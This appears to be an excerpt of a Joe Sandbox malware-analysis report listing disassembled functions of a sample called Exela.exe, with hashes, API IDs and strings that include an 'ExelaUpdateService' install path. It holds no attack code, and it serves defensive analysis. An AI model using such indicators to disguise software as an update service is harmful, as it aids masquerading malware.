                                                                                                                                                                                                                                                            • Opcode ID: 1c0dd48f447bd5919c4c0af8999980ceaa421a823445f2473d5a297136b7fe44
                                                                                                                                                                                                                                                            • Instruction ID: 0165620456f5aed67b588693c8d80212ea9fe7d4883ba501a0ed758bc5c82500
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c0dd48f447bd5919c4c0af8999980ceaa421a823445f2473d5a297136b7fe44
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC91E423B08A4681F7258F29D49637D3B90EB40B54F454136DA5DE73E9DE3EE885830A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                            • Opcode ID: d575cc9c9c6fff3bb6b887c91fcc14de71c27d2c4b886d2e4095e12dd43ef316
                                                                                                                                                                                                                                                            • Instruction ID: d6999650890fc1278c4508cf9ea6df2c8c29cacc5ceca0473d92ec169ac95582
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d575cc9c9c6fff3bb6b887c91fcc14de71c27d2c4b886d2e4095e12dd43ef316
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E81A173F08682A9E765CF2D855A3392EA0AF10B4CF554170CA0DF7295CE2EF881920B
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: 9937fcd42addf426bdc80adcc1b9a62f0535f05a99127480d1a1977f785d18a7
                                                                                                                                                                                                                                                            • Instruction ID: 351b987bff9e5185bc3492c83dc4e4d2d6b55604f54e0682a10aaac2792cf7f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9937fcd42addf426bdc80adcc1b9a62f0535f05a99127480d1a1977f785d18a7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F551D633B296018ADB14CB1DE44573C3BA5EB54B88F408135EA5D93788DF7EE881C709
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                            • Opcode ID: e4646d365215256e67ec22a9df473d11678327abea87c6de7235dddbff79b36e
                                                                                                                                                                                                                                                            • Instruction ID: d649015e857b4f47f4637fd944f0cdfd2059587896717b65471d06eb367b9486
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4646d365215256e67ec22a9df473d11678327abea87c6de7235dddbff79b36e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F361A233A18BC581DB608F29E4413AABBA0FB85784F044225EB9DA3B95DF3DD1D1CB05
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                            • Opcode ID: 723dedddd72afc6468d282760165df683ca6c1680e5e3aacb3d58d0999c557cb
                                                                                                                                                                                                                                                            • Instruction ID: 964ef10b518c2dbaaf6dae603fc6137936e13755b2ecd5ebf12dea4bd7fedb02
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 723dedddd72afc6468d282760165df683ca6c1680e5e3aacb3d58d0999c557cb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9551A233B282828AEB648F1D95563687B90FF54B84F184135DA8DA7B95CF3DE4D0C70A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                            • API String ID: 1878133881-2410924014
                                                                                                                                                                                                                                                            • Opcode ID: 88149bfc2a28579845b544d32f14f9b1101eddfde92b8430b51e14ba55e9a319
                                                                                                                                                                                                                                                            • Instruction ID: 5a719adf300bcb8e9b21232d8531767d1de5e5236fdd4afe8f635d0b8aeb020d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88149bfc2a28579845b544d32f14f9b1101eddfde92b8430b51e14ba55e9a319
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8531B67372868181E620EB18F4527EAB764FF84BC4F804035E68D97A99DF3DD245CB45
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF6E3A639CA), ref: 00007FF6E3A63EE1
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A629C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E3A688E2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A6101D), ref: 00007FF6E3A629F4
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A629C0: MessageBoxW.USER32 ref: 00007FF6E3A62AD0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                                                                            • API String ID: 2581892565-1977442011
                                                                                                                                                                                                                                                            • Opcode ID: a0f4ac4870535fdd3da745cd16929a0880a6c5442cdd0bc39b12d524b6311160
                                                                                                                                                                                                                                                            • Instruction ID: dc61d9b01188e8cfae51e044f94b923d0e3b1d73e1f18b6e13660d69097f7ec4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0f4ac4870535fdd3da745cd16929a0880a6c5442cdd0bc39b12d524b6311160
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23014853B2D74280FB60971DE81B3B53AA5AF487C4F400435D84EEA696EE1EE185874A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                                                                            • Opcode ID: 0a0d81bfe4120ef9cba8412760d98f6ac5c5ee8295e8d3c135a36233c03d6874
                                                                                                                                                                                                                                                            • Instruction ID: bdc1b1e1669fa33aeda0e9878ad84c9927ada267575002897b895a6fd9ee47d9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a0d81bfe4120ef9cba8412760d98f6ac5c5ee8295e8d3c135a36233c03d6874
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06D1EF73B18A818AE710CF69D4812AC3BA5EB447D8B044235CE5EA7BC9DE39D486C345
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                                                            • Opcode ID: b05b5568a63e2e2d0baaa3588e58b47743bee96d0fa3dc0d735729d29a60f88b
                                                                                                                                                                                                                                                            • Instruction ID: f88006cbeb7005bbc4421bd2573f891b0f68c8f0caaf15c59716f96f865d5551
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b05b5568a63e2e2d0baaa3588e58b47743bee96d0fa3dc0d735729d29a60f88b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B11E923B2818242F7548B6DF54A3B96A52EBC4B80F448071DA49A6B9ACE2ED4C1460A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                                                            • Opcode ID: c9256d3c29dec7defdbd069e132950cc3752c5933af8d37e6b370c711f310d19
                                                                                                                                                                                                                                                            • Instruction ID: bfe8b015818ed3fa7bab19f2a43c7c4b25e7b130f6e60fc0021cd378f0b06b22
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9256d3c29dec7defdbd069e132950cc3752c5933af8d37e6b370c711f310d19
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E117022B14F018AEB00DF68E8453B837A4FB18758F041E31DA6DA7BA4EF3DD1A48340
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                            • Opcode ID: f7308ed130ebcec51d7c207d98fe8ad99d28455c8954ade1b0b7718248787264
                                                                                                                                                                                                                                                            • Instruction ID: e60d459c3a7cdd47d5e37718cd7ad978a73bd954bffdb11a0ea6fc22ed169747
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7308ed130ebcec51d7c207d98fe8ad99d28455c8954ade1b0b7718248787264
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9241F713B082C242F7649B29F44A37AAE50EB807A4F104235EF5C97AE9DE3ED4C18706
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E3A79BB6
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A7B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6E3A83972,?,?,?,00007FF6E3A839AF,?,?,00000000,00007FF6E3A83E75,?,?,00000000,00007FF6E3A83DA7), ref: 00007FF6E3A7B502
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A7B4EC: GetLastError.KERNEL32(?,?,?,00007FF6E3A83972,?,?,?,00007FF6E3A839AF,?,?,00000000,00007FF6E3A83E75,?,?,00000000,00007FF6E3A83DA7), ref: 00007FF6E3A7B50C
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6E3A6C125), ref: 00007FF6E3A79BD4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe, xrefs: 00007FF6E3A79BC2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                            • API String ID: 2553983749-1698472059
                                                                                                                                                                                                                                                            • Opcode ID: e02605a42b068f6eccedcb3010d95b522989991cdee656cc9b719bfc68919b09
                                                                                                                                                                                                                                                            • Instruction ID: 1788f8cfe9170df74c6b53c7d4ebd86348775ca304a6c969aa84f0d2e4ff7b3e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e02605a42b068f6eccedcb3010d95b522989991cdee656cc9b719bfc68919b09
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23419333B08A1285EB24DF29D4C22B86BE5EF457D4B14503AE90D93BD9DE3ED4C1830A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                            • Opcode ID: 1c4d8f885a23e91b6f023f5bba01b3d5456b675b65fc2396528dfcf9b2bee20e
                                                                                                                                                                                                                                                            • Instruction ID: b1be68445bb1c1591392d95bfc5434cdb5f0c7241c047e9c002af3fccee24edf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c4d8f885a23e91b6f023f5bba01b3d5456b675b65fc2396528dfcf9b2bee20e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7641E323B18A8191DB20CF29E8853A9BBA0FB88784F404135EE4DD7B98EF3DD481C745
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                            • Opcode ID: c814f4e6a73fca8fb0e34a5fa34791fb923e44da2351119a4fd3a89c16c72e66
                                                                                                                                                                                                                                                            • Instruction ID: 40483afba96b12077aa66ca79d4b8e591a52fa945d82b0b483d045603432e8ac
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c814f4e6a73fca8fb0e34a5fa34791fb923e44da2351119a4fd3a89c16c72e66
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB21E623B0868181EB209B29D48636D77B1FF84B44F518035DA8DE36C9DF7ED685C746
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

